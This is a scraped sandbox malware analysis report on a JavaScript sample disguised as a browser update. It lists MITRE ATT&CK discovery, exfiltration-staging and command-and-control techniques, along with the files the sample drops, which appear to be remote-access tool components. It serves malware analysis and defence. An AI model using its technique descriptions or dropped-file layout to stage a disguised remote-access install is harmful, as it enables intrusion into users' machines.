Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Browser_update16.0.5836.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\7z.bat

C:\ProgramData\7zz.exe

C:\ProgramData\CacheURL.dat

C:\ProgramData\HTCTL32.DLL

C:\ProgramData\HTML_Obj_list.txt

C:\ProgramData\NSM.LIC

C:\ProgramData\NSM.ini

C:\ProgramData\PCICHEK.DLL

C:\ProgramData\PCICL32.DLL

C:\ProgramData\PScripts\insert_delimiter.pscript

C:\ProgramData\PScripts\rot-13.pscript

C:\ProgramData\Settings.txt

C:\ProgramData\TCCTL32.DLL

C:\ProgramData\client32.exe

C:\ProgramData\client32.ini

C:\ProgramData\desktop.ini

Windows Analysis Report
Browser_update16.0.5836.js

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre